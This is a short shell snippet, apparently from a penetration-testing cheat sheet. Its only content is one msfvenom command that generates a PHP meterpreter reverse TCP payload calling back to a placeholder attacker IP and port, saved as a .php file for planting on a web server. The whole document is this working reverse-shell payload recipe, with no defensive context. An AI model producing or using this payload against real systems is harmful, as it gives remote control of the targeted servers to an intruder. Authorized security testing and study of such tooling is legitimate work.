# PHP meterpreter payload
#
msfvenom -p php/meterpreter_reverse_tcp \
	LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
	-f raw -o ${NAME}.php